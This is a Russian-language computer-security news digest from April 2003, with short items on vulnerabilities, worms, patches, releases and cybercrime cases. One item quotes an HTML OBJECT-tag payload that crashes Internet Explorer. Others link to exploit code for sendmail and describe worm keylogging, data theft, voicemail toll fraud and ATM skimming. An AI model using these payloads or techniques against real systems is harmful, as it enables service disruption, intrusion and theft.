Администрация университета штата Пенсильвания приняла меры против 220 своих студентов, использовавших предоставляемый университетом доступ в интернет для активного обмена цифровой музыкой. Сделано это было в ответ на жалобы со стороны правообладателей. После получения жалобы в университете было проведено внутреннее расследование, в ходе которого выяснилось, что многие студенты с помощью пиринговых сетей предоставляли открытый доступ к музыке на своих компьютерах. Чтобы избежать конфликтов с RIAA, в университете решили лишить провинившихся студентов доступа в Сеть. Впрочем, учетные записи студентов не были полностью заблокированы. Они не могут выходить в интернет лишь с компьютеров в своих комнатах. Выход в Сеть с других компьютеров для них возможен. По словам представителя университета Тайсена Кендига, доступ в интернет будет восстановлен, как только студенты удалят со своих компьютеров пиратские материалы. Несколько раньше - 31 марта - ректор учебного заведения Родни Эриксон разослал сотрудникам и студентам университета электронное письмо, в котором объявил о запрете пользования пиринговыми сетями. Подробности - http://www.compulenta.ru/2003/4/23/39186/
23/04/2003 11:07 Borland выпустит инструментарий для разработчиков ПО на платформе .Net.
Компания Borland намерена выпустить в нынешнем году широкий спектр средств разработки приложений для платформы .Net. Лицензию на технологию .Net эта компания получила еще в январе, а сейчас программисты Borland полным ходом создают инструменты для обеспечения полного жизненного цикла .Net-приложений - от проектирования и написания кода до тестирования, внедрения и администрирования. Одним из первых инструментов Borland для работы на платформе .Net станет среда C# Builder, предназначенная, как видно из названия, для создания приложений на языке C#, созданном Microsoft специально для .Net. Проект C# Builder также известен под названием Sidewinder и должен появиться на рынке нынешним летом в нескольких вариантах. Наиболее интересной особенностью C# Builder будет возможность встраивать в код приложений на C# код на базе технологий Java (версия J2EE) или CORBA. Инструментарий для работы с C# от Microsoft не позволяет включать такой код в состав разрабатываемых приложений. Они могут взаимодействовать с Java-программами только посредством стандартных протоколов для взаимодействия веб-сервисов. Источник - http://news.com.com/
23/04/2003 10:25 AT&T продолжает борьбу с телефонными мошенниками.
Американская телефонная корпорация AT&T во вторник, 22 апреля, объявила о мерах по защите от фрикеров, пользующихся ее линиями бесплатно через взломанные ящики голосовой почты. Записав на автоответчик голосовой почты слово «yes» (да), можно затем позвонить на этот номер, используя так называемый «collect call», т.е. разговор за счет вызываемого абонента. Автоматическая система требует от пользователя на другом конце провода сказать «yes», чтобы соединение состоялось. После этого можно позвонить по любому номеру, а платить за разговор будет неудачиливый владелец ящика. Подробности способа компания, естественно, не оглашает. В январе AT&T установила в своей сети голосовую систему, блокирующую вызовы из стран, откуда приходит большинство нелегальных звонков. Теперь — вместо ответа «yes» нужно проговорить или набрать случайный код, выданный автоматическим оператором. Таким образом, хакеры, вошедшие в систему голосовой почты, больше не смогут автоматизировать включение разговора за счет вызываемого абонента. Корпорация также советует своим абонентам почаще прослушивать свои голосовые почтовые ящики на предмет «соглашательских автоответчиков» и не использовать простые пароли и пароли по умолчанию. Источник - http://www.cnews.ru
22/04/2003 16:14 Слежение за изменениями в файловой системе и защита от DDoS атак.
Как сообщает www.opennet.ru, вышла вторая часть статьи "File Integrity and Anti-DDoS Utilities" (в первой части рассказывалось о настройке tripwire) в которой показано как при помощи пакетов программ aide и yafic осуществлять слежение за целостностью файловой системы для обнаружения подмененных злоумышленником программ. Что касается обнаружения распределенных DoS атак, то приводится обзор трех программ для обнаружения в локальной сети хостов участвующих в атаке: trinoo (UDP 27444, UDP 27665), tfn (ICMP) и stacheldraht (TCP 16660, TCP 65000, ICMP). Статья - http://www.onlamp.com/pub/a/bsd/2003/04/03/FreeBSD_Basics.html
22/04/2003 15:04 В Москве определят лучших студентов-программистов.
Как сообщает internet.ru, 26 апреля в Москве пройдет открытое индивидуальное первенство по информатике среди студентов и старшеклассников. По итогам Первенства авторитетное жюри отберет лучших участников в трех категориях. Призовой фонд соревнований составит около $3000. Первенство, организованное с целью поддержать российское высшее образование, пройдет в трех подгруппах: студенты (1-3 курсы), выпускники (4-6 курсы) и профессионалы (участники полуфиналов Чемпионата мира по программированию). Участникам будет предложены задачи, связанные с разными разделами информатики, - теорией алгоритмов, теоретическими основами информатики, базами данных, оптимизацией моделей данных и т. д. Подробнее - http://www.cboss.ru/
22/04/2003 14:43 Недельный отчет о вирусах Panda Software.
Вышел недельный отчёт о вирусах компании Panda Software. Он посвящён обзору двух червей - VBS/Lisa и Refoav, а также троянца Dialer.AF. VBS/Lisa распространяется посредством каналов IRC, общих сетевых дисков и программы KaZaA. В случае с электронной почтой червь распространяется в сообщении с темой "Click YES and vote against war!". Кроме того, данный червь создает более 5000 папок в корневом каталоге жесткого диска и копии текстового файла, содержащего строку "I will never stop loving you" в каждой папке. VBS/Lisa записывыет несколько команд в файл Autoexec.bat для форматирования диска C:\\ и перезагружает компьютер. Также этот червь уничтожает файл "Regedit.exe" и, если после заражения прошло от трех дней и более, VBS/Lisa удаляет следующие файлы: "user.dat", "user.bak", "system.dat", "system.bak" и "win.com". Наконец, VBS/Lisa отключает все ярлыки, находящиеся на рабочем столе, и, для усложнения работы антивирусной программы, вставляет специальные символы в их коды. Более подробно можно почитать по ссылке, приведённой ниже. Подробное описание - http://www.viruslab.ru/press/index.php?go=show&num=135
22/04/2003 13:17 Уязвимость состояния операции в Windows XP в Service Control Manager.
Уязвимость обнаружена в Windows XP в Service Control Manager. Локальный пользователь может раскрыть чувствительную информацию. Согласно сообщению, служба имеет ограниченное время (примерно 20 сек) между получением управляющего кода SERVICE_CONTROL_SHUTDOWN и фактического завершения работы системы. Служба может запросить у системы дополнительное время перед завершением работы. Однако, если служба не смогла полностью завершить работу в достаточное время, система запишет кэшируемые данные к открытым файлам службы. Кэшируемые данные могут включить информацию от файлов, к которым имеет доступ служба, в том числе доступные только администратору системы. Локальный пользователь может читать такие файлы после перезагрузки системы, чтобы получить потенциально чувствительную информацию. Уязвимость обнаружена в Windows XP Подробности - http://www.securitylab.ru/?ID=37389
22/04/2003 12:23 Некорректный патч от Microsoft.
Эксперты по компьютерной безопасности рекомендуют с осторожностью относиться к последней из заплаток, выпущенной корпорацией Microsoft для ОС Windows 2000. Дело в том, что в состав патча включено большее количество файлов, чем указано в его описании. В частности, в состав новой заплатки входит файл Ntdll.dll, который был причиной возникновения сбоев в некоторых конфигурациях Windows 2000. Поскольку Microsoft ничего не сообщает о том, ликвидирована ли данная проблема, с установкой заплатки следует повременить. Кроме того, аналогичная заплатка для ОС Windows XP, по некоторым данным, конфликтует с популярными антивирусами EZ Trust, Norton Antivirus, MacAfee 7 и Sophos, существенно замедляя работу компьютера. Подробнее - http://www.vnunet.com/News/1140296
22/04/2003 11:09 За антивоенные взгляды разработчиков OpenBSD лишили финансирования.
В середине апреля стало известно, что Агентство перспективных военных разработок (DARPA) Министерства обороны США отказалось от дальнейшего финансирования проекта OpenBSD. Об этом сообщил прессе лидер проекта Тео де Раадт, который проживает в Калгари (провинция Альберта, Канада). По словам де Раадта, о прекращении финансирования он узнал от профессора Пенсильванского университета Джонатана Смита, который также участвовал в проекте OpenBSD и вел все дела, связанные с грантом DARPA. Причины, по которым DARPA решила завершить финансирование проекта, не называются. Комментаторы так или иначе связывают это с войной в Ираке и ростом патриотических настроений в США. В частности, чиновникам DARPA, да и участникам проекта из Пенсильванского университета, очень непонравились антивоенные заяаления де Раадта, которые тот сделал в интервью канадской газете The Globe and Mail. Де Раадт осудил войну в Ираке и сообщил, что ему неудобно получать деньги от американских военных. Своё двойственное положение руководитель сообщества OpenBSD оправдывал тем, что его работа позволит хоть немного снизить объемы выпуска новых вооружений. Другой причиной отзыва гранта могло послужить то, что в проекте участвовали множество неамериканцев, что также могло не понравится военным. OpenBSD 3.3 выйдет в свет 1 мая, как и было намечено. Однако прекращение финансирования проекта поставило под угрозу проведение конференции разработчиков OpenBSD, которая намечалась на 8-20 мая. Подробности - http://www.computerworld.com/securitytopics/security/story/0,10801,80473,00.html
22/04/2003 10:42 В Москве задержаны потрошители банкоматов.
В Москве задержана группа мошенников, похитивших с банковских счетов граждан более $700 тыс., сообщила сегодня сотрудник пресс-службы Управления по борьбе с экономическими преступлениями ГУВД столицы Ирина Волк. По ее словам, с января этого года в УБЭП стали поступать сигналы от граждан о том, что с их банковских счетов исчезают крупные суммы денег. Деньги снимались в основном из банкоматов, установленных вдоль Садового кольца. За большинством из них организовали круглосуточное наблюдение, в ходе которого был задержан студент Московского автодорожного института. Установлено, что задержанный вместе со своими друзьями изготовил специальное устройство, которое вставлялось в гнездо приема карточки банкомата. Это устройство в момент пользования банкоматом считывало все параметры кредитной карты. Кроме того, они сделали миниатюрную видеокамеру, которая считывала PIN-код. После получения данных мошенники подделывали карты и снимали деньги с банковских счетов. В УБЭП отметили, что в столице это первое масштабное преступление, связанное с использованием поддельных банковских карт. Источник - http://www.cnews.ru
21/04/2003 14:42 Недостаток в SMB-протоколе.
Как сообщают Salman Niksefat и Haamed Gheibi из Иранского (ir?) университета в Amirkabir, ими обнаружен Недостаток в SMB/CIFS-протоколе, который позволяет получить полный доступ к общим ресурсам в Windows-системах. Злонамеренный SMB сервер может подтвердить подлинность на системе клиента и получить получить полный контроль над разделенными объектами, типа C$ и т.п. Windows по умолчанию посылает NT/LM-Response зарегистрированных пользователей к SMB серверу, перед тем, как спросить любое имя пользователя/пароль. Злонамеренный SMB-сервер может использовать эту информацию, чтобы подтвердить подлинность на машине клиента. Осуществление этой процедуры нетривиально и требует тонкого знания работы NTLM-аутентификации и SMB-протокола. Как сообщается, существует рабочий эксплоит, который будет опубликован публично после выхода соответствующей заплаты от Microsoft. Однако, согласно сообщения Dave Aitel из Immunity, Inc., технология, описанная студентами известна уже давно и была продемонстрирована господином с ником dildog на DefCon ещё 3 года назад - тем не менее, патч Microsoft до сих пор не выпущен. Уязвимость обнаружена в ОС: Windows 9x/Me/XP/2K/.NET. (Прим. в данном материале использован перевод с securitylab.ru). Подробности - http://seclab.ce.aut.ac.ir/vreport.htm
21/04/2003 14:13 Курсантов учат сражаться с хакерами.
На прошлой неделе в американских военных академиях прошли необычные учения. Курсантам надлежало отразить кибератаку. Учащиеся нью-йоркского Вест Пойнта (West Point) держали оборону против группы сотрудников Национального агентства по безопасности, нового отдела федеральной разведки, который специализируется на электронном сборе информации и криптографии. Источник - http://www.webplanet.ru/news/internet/2003/4/21/army_vs_hackers.html
21/04/2003 13:38 Атака — это еще не война.
Волна вандализма, направленная против арабских веб-сайтов, была спровоцирована войной в Ираке. По словам системных администраторов и специалистов по сетевой безопасности, нападениям подверглись десятки сайтов. Один из самых популярных англоязычных порталов об исламе, Islamonline.Net, после выступления американских войск в Заливе был вынужден справляться с удвоенным объемом трафика, и виноваты в этом хакеры. Страница не имеет ничего общего с агрессивной мусульманской пропагандой и военным экстремизмом, она рассказывает о религии в спокойных, размеренных тонах. «Это несправедливо, — сказал в интервью USA Today администратор сайта Марьям аль-Хаджири (Mariam al-Hajiry), — но, видимо, в этом часть задачи, которую мы взвалили себе на плечи с целью донести наши слова». Нельзя точно назвать число атакованных ресурсов, однако самой популярной мишенью, без сомнения, стало представительство в интернете катарского спутникового канала Al-Jazeera, он часто называется единственным независимым источником новостей в арабском мире. Одновременно точно такие же хакеры, только происламски настроенные, мешали нормальной работе американских и британских страниц. Источник - http://www.webplanet.ru
21/04/2003 13:05 Спамеру не удалось засудить антиспамера.
Интересный судебный прецедент имел место в американском штате Мэриленд. Некто Джордж Мур-младший, рассылавший по электронной почте рекламу пищевых добавок для снижения веса, подал в суд на получателя своего спама. Увы, спамера ждала неудача: дело он проиграл. Одной из жертв Мура оказался Френсис Юи, технический специалист из Университета имени Джона Хопкинса. Предложения купить пищевые добавки регулярно засоряли его почтовый ящик. Поскольку в рекламных письмах содержалась контактная информация о продавце, Фрэнсису удалось выяснить место жительства Мура. Он выложил эти данные на свой интернет-сайт и призвал других пострадавших подавать на Мура в суд (стоит добавить, что Мур уже фигурирует в черных списках антиспамерских организаций). Посетители сайта, особенно уставшие от спама, не стали подавать в суд, а решили обойтись собственными силами. Они стали звонить Муру и оставлять угрозы на его автоответчике, а в довершение всего подписали неудачливого спамера на всевозможные бесплатные каталоги и рассылки рекламных объявлений, притом не электронные, а бумажные. Мур подал на Юи в суд, обвинив его в оскорбительных действиях, и потребовал, чтобы из сети была удалена страничка с его адресом. Судья наотрез отказался удовлетворить иск Мура, решив, что в происшедшем нет вины ответчика, поскольку тот сам никаких противозаконных действий не предпринимал. Источник - http://www.washingtonpost.com/
21/04/2003 12:59 Повторяющаяся ошибка в Office 2000.
Из-за дефекта последнего обновления Microsoft Office 2000 приложение многократно требует от некоторых пользователей зарегистрировать его. По словам представителя Microsoft, баг влияет только на пользователей Office 2000, не имеющих прав администратора своего компьютера. «Им выдается неожиданное предложение зарегистрироваться, но это не нарушает работы приложения», — сказал он. Сотрудник одной британской компании, попросивший не называть его имени, рассказывает, что люди, напуганные предложениями о регистрации, чуть не снесли ее службу техпомощи. «Microsoft очень тихо ведет себя в отношении этого глюка. Я ничего не нашел ни на одной из ее веб-страниц», — сказал он. Проблема может быть вызвана недавним патчем. Если так, то это не первый случай кривой поправки к ПО. В прошлом месяце патч Microsoft для Windows 2000 привел к выводу из строя некоторых машин. Надежность и безопасность — две опорные колонны инициативы Microsoft Trustworthy Computing, направленной на повышение уровня качества популярных приложений софтверного гиганта. Подробности - http://www.zdnet.ru/?ID=299756
21/04/2003 11:37 Интернет-червь "Coronex" спекулирует на страхе перед вирусом SARS.
Вирусописатели, на все лады ухищряясь в придумывании "актуальных" тем для компьютерных вирусов, не могли обойти стороной эпидемию вируса SARS - вируса атипичной пневмонии, который унес жизни более 18- человек по всему миру. Перед началом рассылки червь выводит на экран сообщение "SARS virus, corona virus, кнопочка "ОК". Кроме того, червь подменяет текущую стартовую страницу Internet Explorer ссылкой на статью, посвящённую вирусу SARS, на интернет-сайте Всемирной Организации Здравоохранения: http://www.who.int/csr/don/2003_04_19/en. При рассылке зараженных писем червь "Coronex" считывает адреса из адресной базы WAB и затем напрямую подключается к SMTP-серверу. Рассылка писем выполняется каждый час, в момент времени xx:01:01. Значения полей "От" и "Тема", текст письма и имя вложения могут варьироваться. Подробности - http://www.viruslist.com/index.html?tnews=1001&id=2156213
21/04/2003 10:41 Червь "Mintal" распространяется через TheBat!
В сети обнаружен новый многокомпонентный интернет-червь "Mintal". Он примечателен тем, что распространяется через почтовую систему TheBat!. "Mintal" представляет собой приложение Windows (PE EXE-файл) и написан на Delphi. Компонентами червя являются: "install.exe" или "hwminstall.exe" - "дроппер", размер около 310K (упакован ASPack, распакованный размер - около 760K). "insthwm.dll" - основная компонента, размер около 650K. "SVSHOST.EXE" - компонента рассылки писем, также содержит троянскую процедуру, размер около 490K. "hwmdll.dll" - библиотека перехвата и ведения лога клавиатуры, размер около 41K. При старте "дроппер" создаёт в системном каталоге Windows подкаталог \hwminstall и копирует себя в него с именем "install.exe", также в системном каталоге в файле "insthwm.dll" создаётся основная компонента червя. При запуске компоненты "insthwm.dll" она создаёт в системном каталоге еще два файла (компоненты червя): "SVSHOST.EXE" и "hwmdll.dll" и запускает "SVSHOST.EXE" на выполнение. "SVSHOST.EXE" выполняет следующие действия: 1. Получает доступ к базе данных TheBat!, ищет в ней адреса электронной почты и рассылает по ним свои копии, вложенные в письма. При рассылке "Mintal" использует протокол SMTP (прямой доступ) и отсылает свои письма через почтовый сервер "smtp.bk.ru". Зараженные письма содержат: Заголовок: Зацени прогу, Текст: Зацени новую прогу! Имя вложения: install.exe. 2. Перехватывает клавиатуру и при запуске программы "WebMoney.exe" ведет лог нажимаемых символов, перехваченная информация затем отправляется на адрес злоумышленника (возможно, автора вируса). Туда же отсылается персональная информация из каталога ICQ. 3. Скачивает свои новые версии с сайта "http://www.demonxtex.narod.ru" и запускает их на выполнение ("апгрейдит" себя). Источник - http://www.kaspersky.ru
21/04/2003 10:22 Вышло ядро linux 2.5.68
Очередная версия нестабильного ядра Linux. Множественные обновления в коде USB, Alpha, Sparc, XFS, scsi, ia64. Скачать - ftp://ftp.kernel.org/pub/linux/kernel/v2.5/linux-2.5.68.tar.bz2
20/04/2003 17:27 Ещё одна уязвимость в IE?
Adam Blaszczyk утверждает, что им найдена новая уязвимость в Internet Explorer - на этот раз в sysmon.ocx. Поискав в Интрнет, он не обнаружил ничего подобного, кроме примера на http://www.ussrback.com/labs57.html, однако, там, поу тверждению автора, используется другой CLSID. Ссылка на страничку, с которой можно свалить свой IE, приведена ниже - желающие могут проверить, нажав на кнопку "Crash now".. Эксплоит - http://www.sztolnia.pl/hack/TrivialIECrash2/TrivialIECrash2.html
20/04/2003 15:36 Утечка памяти в xinetd.
По сообщению Steve Grubb, им обнаружена возможность проведения DoS-атаки против серверов, сервисы которых контролируются xinetd (пришёл на замену старому inetd). Уязвимость связана с утечкой памяти (около 144 байт), которая возникает при неудавшейся попытке соединения. Сам автор обнаружил её в феврале этого года, когда его сервер был атакован FTP-червем. После организации около 5000 соединений сервер "упал". После анализа исходного кода был сделан вывод о потере 144 байт на каждое неудачное соединение. Уязвимость обнаружена в версии 2.3.10, вышедшей в январе (в предыдущей версии была обнаружена утечка фаловых дексрипторов). В связи с этим выпущена версия 2.3.11, на которую рекомендуется всем перейти. Подробности - https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=88537
20/04/2003 14:13 Опубликован исходный код Darwin 6.5.
Команда разработчиков Darwin'а опубликовала исходный код Darwin 6.5, используемый в Mac OS X 10.2.5. "Darwin 6.5 - это именно то, что мы называем "on-cycle" релизом исходного кода, когда исходники Darwin'а становятся доступными вскоре после релиза Mac OS X для покупателей." Некоторые проекты (такие как gcc, gdb, CUPS, Rendezvous) продолжат делать "off-cycle" релизы, так как исходный код обновляется чаще, чем появляются коммерческие релизы. Информация получена всё от того же SHuRuP-а. Исходный код - http://www.opensource.apple.com/darwinsource/10.2.5/
20/04/2003 13:09 Вышла NetBSD 1.6.1.
По информации от SHuRuP (www.nixp.ru), команда разработчиков NetBSD представила общественности релиз операционной системы NetBSD 1.6.1. В новой версии: исправлены ошибки в безопасности, улучшена поддержка некоторых устройств в существующих драйверах, добавлены новые драйверы, добавлен порт evbsh3 в бинарный дистрибутив, произведены незначительные исправления в пользовательской среде. Дистрибутив NetBSD 1.6.1 состоит из полного исходного кода NetBSD, бинарных релизов 40 портов, включая X Window System, и релиз NetBSD Packages Collection 1.6.1. Подробности - http://netbsd.org/Releases/formal-1.6/NetBSD-1.6.1.html
20/04/2003 12:41 Статья о безопасности беспроводных сетей.
Компания IBM опубликовала первую часть статьи, посвящённой обеспечению безопасности бепроводных (WLAN или Wi-Fi) сетей под названием "Securing 802.11 Transmissions, Part 1: 802.11x's Elusive Security". Наверняка многие слышали о людях, которые разъезжают на велосипедах (автомобилях) по Штатам (где наиболее распространены Wi-Fi сети) и получающих беспрепятственно доступ к подобным сетям при помощи ноутбука и WLAN-устройства. Описанию защиты таких сетей на базе cтандарта 802.11 и посвящена серия статей IBM. Статья - http://www-106.ibm.com/developerworks/wireless/library/wi-80211security.html/
20/04/2003 11:58 Генератор эксплоитов для переполнения буфера.
На том же пакетшторме выложен исходный код генератора эксплоитов для переполнения буфера, написанного c0wboy из 0x333.org. Исходный код - http://packetstorm.linuxsecurity.com/UNIX/penetration/0x333xes.c
20/04/2003 11:47 Локальный эксплоит sendmail.
Опубликован локальный эксплоит sendmail 8.11.6. Автор - sorbo из darkircop. Уязвимость была обнаружена ранее Michal Zalewski и заключается в уязвимости функции prescan(), позволяющей злоумышленнику обойти проверку длины буфера. В результате можно переполнить pvpbuf[] в функции parseaddr() и модифицировать указатель фрейма. Более подробно технология взлома описана в предисловии исходника. Эксплоит - http://packetstorm.linuxsecurity.com/0304-exploits/sormail.c
20/04/2003 10:43 Брать ли хакера сисадмином?
Жаркая дискуссия разгорелась на проходящей в Сан-Франциско конференции RSA по компьютерной безопасности. Камнем преткновения стал вопрос: "Можно ли доверять отбывшему наказание хакеру управление корпоративной сетью?". В своей речи перед участниками конференции знаменитый Кевин Митник, который был неоднократно осужден за компьютерные преступления, а сейчас занимается консалтингом в сфере компьютерной безопасности, заявил, что бывших хакеров следует принимать на работу, но только после тщательной проверки. "Я думаю, все зависит от личных качеств и пользы, которую тот или иной человек может принести компании". По мнению Кевина, большинство высокооплачиваемых специалистов, которые ныне трудятся в солидных компаниях, раньше "баловались" хакерством. Часть из них не совершила ничего противозаконного, но на совести некоторых серьезные преступления, просто их не удалось поймать. "Со многими весьма уважаемыми господами мы в свое время обменивались информацией об обнаруженных дырах в защите", - заявил он. Подробнее - http://www.SecurityLab.ru/?ID=37364
19/04/2003 12:40 DoS против Microsoft Windows 2003.
Отказ в обслуживании обнаружен в Microsoft Windows 2003 в 'win2k.sys'. Пользователь может заставить уязвимое приложение распечатать не - ASCII символы, что приведет к аварийному завершению работы системы. Как сообщается, Windows NT5.2 приложения, использующие функцию "EngTextOut" , могут аварийно завершить работу системы, при попытке распечатать не- ASCII символы. Проблема, по сообщениям, находится в "win32k.sys". Уязвимость обнаружена в Windows 2003, Windows .NET, Windows Whistler. Подробности - http://www.SecurityLab.ru/?ID=37347
19/04/2003 11:37 Java-карточки в качестве паспорта.
Согласно пресс-релизу Sun, в Бельгии начато внедрение электронных идентификаторов, выдаваемых каждому жителю старше 12 лет. Идентификатор представляет из себя так называемую Java Card - смарт карту, поддерживающую выполнение Java аплетов созданных для JCAE (Java Card Application Environment). Этот проект является одним из состовляющих инициативы eGoverment Подробности - http://www.sun.com/smi/Press/sunflash/2003-04/sunflash.20030410.2.html
19/04/2003 10:33 Novell анонсировал клиент Novell GroupWise для рабочих станций под Linux и Mac.
Разработчик сетевого ПО Novell анонсировал клиент Novell GroupWise для рабочих станций под Linux и Macintosh. Клиент GroupWise на основе Java для Linux и Macintosh базируется на технологии, которую Novell приобрела у N-iX, отделения Newcomp Computer Systems. GroupWise, решение семейства Novell Nterprise, управляет электронной почтой, календарем, немедленным обменом сообщений, контактами, документами и документооборотом на самых разнообразных операционных системах, включая Novell NetWare и Windows NT/2000. Источник - http://www.cnews.ru
19/04/2003 09:16 Новая версия антивируса DrWeb.
16 апреля вышла новая версия популярного антивируса И.Данилова (ООО "СалД") - DrWeb v.4.29c для Windows 95/98/Me/NT/2000/XP, DOS/386, OS/2 и Novell NetWare. В этих версиях: в демонстрационном режиме работы Dr.Web убрано ограничение на проверку упакованных исполняемых файлов; реализована проверка архивов формата LHA; исправлены ошибки разбора разрушенных RAR-SFX архивов; исправлена ошибка распаковки многотомных RAR-архивов; исправлен разбор почтовых сообщений в формате UUE. Во всех версиях для Windows расширена проверка файлов автозапуска, исправлена обработка файлов с зарезервированными именами. В SpIDer Guard для Windows 95/98/Me исправлена ошибка, из-за которой при отключении проверки архивов прекращалась распаковка контейнеров и почтовых баз, добавлен контроль за файлам, упаковываемыми AlZip. Подробности - http://www.drweb.ru
18/04/2003 16:06 Уязвимость в MS Internet Explorer.
Ryan Emerle, ведущий системный разработчик из фирмы Interactive Network Systems, Inc. обнаружил уязвимость в MSIE версии 6.0, связанной с некорректной обработкой тэга OBJECT tag. При сформировании специальной страницы, содержащей код: <object id="test" data="#" width="100%" height="100%" type="text/x-scriptlet" VIEWASTEXT></object> происходит "сваливание" IE с закрытием всех сессий. Автор проверял уязвимость в Windows 2000 Pro SP3 с Internet Explorer 6.0.2800.1160 SP1. Как стало известно из дальнейшего обсуждения, также уязвима ОС - Windows XP SP1 с IE 6 SP1. Источник - http://www.securityfocus.com
18/04/2003 15:08 Уязвимости в препроцессорах IDS Snort.
Вышел бюллетень по безопасности CERT CA-2003-13, в котором описывается наличие уязвимостей в 2-х препроцессорах (модули предварительной обработки пакетов для дальнейшего анализа) системы определания попыток вторжения Snort. Первая связана с модулем обработки RPC-пакетов и позволяет удалённому атакующему переполнить буфер из-за некорректной обработки длины принимаемых пакетов. Обнаружена была Internet Security Systems (ISS). Вторая уязвимость, обнаруженная CORE Security Technologies, связана с возможностью переполнения кучи в модуле препроцессора "stream4". При этом возникает возможность выполнения произвольного кода в пространстве памяти snort и с привилегиями суперпользователя. Уязвимости обнаружены в версиях - 1.8.x, 1.9.x, and 2.0 до RC1. Администраторам рекомендуют обновить IDS Snort. Подробности - http://www.cert.org/advisories/CA-2003-13.html
18/04/2003 14:29 Cтатья "Postfix -- the Sendmail Replacement".
Благодаря Rend c форума RTFM (www.sysadmins.ru) обнаружена ссылка на статью "Postfix -- the Sendmail Replacement". Как известно, Postfix - комплекс почтовых утилит, предложенных Wietse Venema для замены монолитной почтовой программы Sendmail. В статье описывается состав, работа и настройка Postfix. Cтатья - http://www.akadia.com/services/postfix_mta.html
18/04/2003 13:53 Очередной бесплатный семинар Softline.
Компания SoftLine приглашает Вас 22 апреля 2003г. принять участие в БЕСПЛАТНОМ семинаре на тему "Интегрированные решения Symantec для защиты корпоративной сети предприятия". Регистрация начинается в 9.30. Место проведения семинара: Математический Институт им.Стеклова по адресу: г.Москва, ул. Губкина, 8. Для участия в семинаре необходима регистрация на сайте компании. Регистрация - http://www.softline.ru/seminar.asp?...
18/04/2003 13:14 Новая статья на securityfocus.
Как объявил Hal Flynn из Symantec Corp., на сайте securityfocus.com опубликована вторая часть статьи о криптографических файловых системах "Cryptographic File Systems, Part Two: Implementation". Автор - Ido Dubrawsky. В этой части рассказывается о практических реализаций файловых систем с шифрацией содержимого. Основной упор при изложении сделан на EFS из Windows 2000 и CryptoAPI в Linux. Статья - http://www.securityfocus.com/infocus/1685
18/04/2003 12:09 Безопасность: новый антивирус и антихакерская система.
Главным событием в области компьютерной безопасности за последнее время стала конференция RSA 2003, проходящая в эти дни в Сан-Франциско, штат Калифорния. Эта конференция проводится ежегодно и проходит уже в двенадцатый раз. Одним из наиболее интересных продуктов, представленных на конференции RSA 2003, стала система обнаружения вторжений iForce Intrusion Detection Appliance, созданная совместными усилиями компаний Sun Microsystems и Symantec. Система основана на сервере Sun LX50 и пакете Symantec ManHunt. Что интересно, эта система базируется на платформе Solaris x86, а не на 64-разрядной платформе Sun SPARC. Сообщество Liberty Alliance выпустило черновую спецификацию нового варианта одноименной системы аутентификации в интернете. Спецификации Liberty Alliance Phase 2 включают в себя подсистему идентификации для веб-сервисов Liberty Identity Web Services Framework (ID-WSF) и спецификации интерфейсов для служб идентификации Liberty Identity Service Interface Specifications (ID-SIS). Главной задачей этих компонентов является создание надежной системы идентификации, ориентированной на веб-сервисы и совместимой с другими решениями в данной области. Компания Panda Software объявила о выпуске новой версии своего антивируса, рассчитанного на использование с новой серверной операционной системой Windows Server 2003. Подробнее - http://www.compulenta.ru/2003/4/16/39079/
18/04/2003 11:48 Поврежденные документы Word можно восстановить.
Испанская софтверная компания Schmiede Cimaware выпустила версию 2.0 своего пакета WordFix. Это ПО позволяет восстанавливать поврежденные слова в документе. WordFix 2.0 доступен в трех вариантах - Standard, Pro и Enterprise Edition и работает как под управлением Windows, так и под Mac OS. Стандартная версия (ее ориентировочная цена - $89) предлагает общее восстановление поврежденного текста. Как утверждают разработчики, документ может быть восстановлен буквально за секунду. При этом не существует ограничений на объем восстанавливаемого документа. Профессиональная версия ($149) восстанавливает текст с учетом форматирования параграфов и страниц, а также может сохранять таблицы, сноски и графику и восточноевропейские алфавиты. Версия для предприятий по стоимости не отличается от профессиональной, но позволяет восстанавливать несколько поврежденных документов Word одновременно. Источник - http://www.cnews.ru
18/04/2003 11:15 Америка опасается кибертерроризма.
Во вторник, выступая на десятой ежегодной конференции в Сан-Франциско, посвященной компьютерной безопасности, специалисты заявили, что в настоящий момент не существует средств защиты от нападений хакеров, похитителей идентификационных данных и согласованных атак враждебных держав, так как информационные технологии не развиваются достаточно быстро. «Нам кажется, эта проблема не получает должного внимания», — сообщил Арт Ковилло (Art Coviello), президент компании RSA Security, устроителя конференции. Ховард Шмидт (Howard Schmidt), советник Белого Дома по безопасности, объяснил агентству Reuters, что до сегодняшнего дня основная работа была направлена на поиск новых идей по усилению защиты, воплощение которых происходит, конечно, медленней. «Однако можно говорить о безусловном прогрессе», — заверил Шмидт. Представитель частной структуры TruSecure Расс Купер (Russ Cooper), в свою очередь, выразил удивление по поводу отсутствия видимых успехов с сентября, когда правительство торжественно объявило о плане укрепления кибербезопасности. «Мне кажется, все беспокойство направлено у нас на оружие массового уничтожения», — говорит он. Подробнее - http://www.webplanet.ru/news/internet/2003/4/17/cyber_terror.html
18/04/2003 11:14 Novell встает в очередь к open-source.
Производитель сетевого ПО обнародовал планы по установлению более тесных связей между своими продуктами и ПО с открытым исходным кодом. На ежегодной конференции Novell Brainshare компания сообщила, что намерена комплектовать программным обеспечением open-source свои собственные продукты, включая флагманскую операционную систему NetWare, и предложила инициативы по привлечению разработчиков open-source к использованию ПО Novell. Руководители компании подчеркнули также, что Novell будет вводить в свои продукты стандарты веб-сервисов, в том числе стандарт Universal Description, Discovery and Integration (UDDI) для поиска веб-сервисов в сети. В комплект поставки NetWare 6.5, которая будет выпущена этим летом, войдет СУБД с открытым исходным кодом MySQL и веб-сервер Apache. Кроме того, эта версия NetWare будет включать сервер Java-приложений Java 2 Enterprise Edition (J2EE) версии 1.3, который Novell приобрела в прошлом году вместе с компанией SilverStream Software. Это облегчит создание бизнес-приложений с использованием NetWare и обмен информацией с приложениями на других платформах. Источник - http://zdnet.com.com/2100-1104-996978.html
18/04/2003 10:11 RSA: разбиение паролей бережет секреты.
